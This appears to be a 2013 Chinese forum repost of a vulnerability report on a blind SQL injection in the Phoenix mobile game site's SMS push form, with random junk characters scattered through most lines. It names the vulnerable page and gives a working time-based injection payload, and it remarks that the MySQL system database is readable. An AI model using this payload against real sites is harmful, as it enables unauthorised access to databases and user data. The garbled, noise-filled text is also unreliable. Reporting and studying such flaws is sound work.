简要描述:, I Z- ~, ~' T; T# ]4 h' P
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。0 w- O- w/ D+ r9 w5 W, ]; K8 x
) f0 a6 n- Q- _) a1 Q
详细说明:3 K& ^% l1 J7 Y( p6 _* F, q
存在SQL盲注url:* c4 L% B3 }4 \. d" V& z, x; v5 ]3 X `
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1& t% F# _8 T& M: r3 ^. |- a
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png# X* T8 z" J8 I. x' H2 J4 y* w" @
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
5 ]7 }$ Q1 p- R% _, O0 |( {- _; z5 Fhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg( z% ]2 k. \. T9 F+ n @
1 w' g* S+ S* K% w- \% u8 g
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对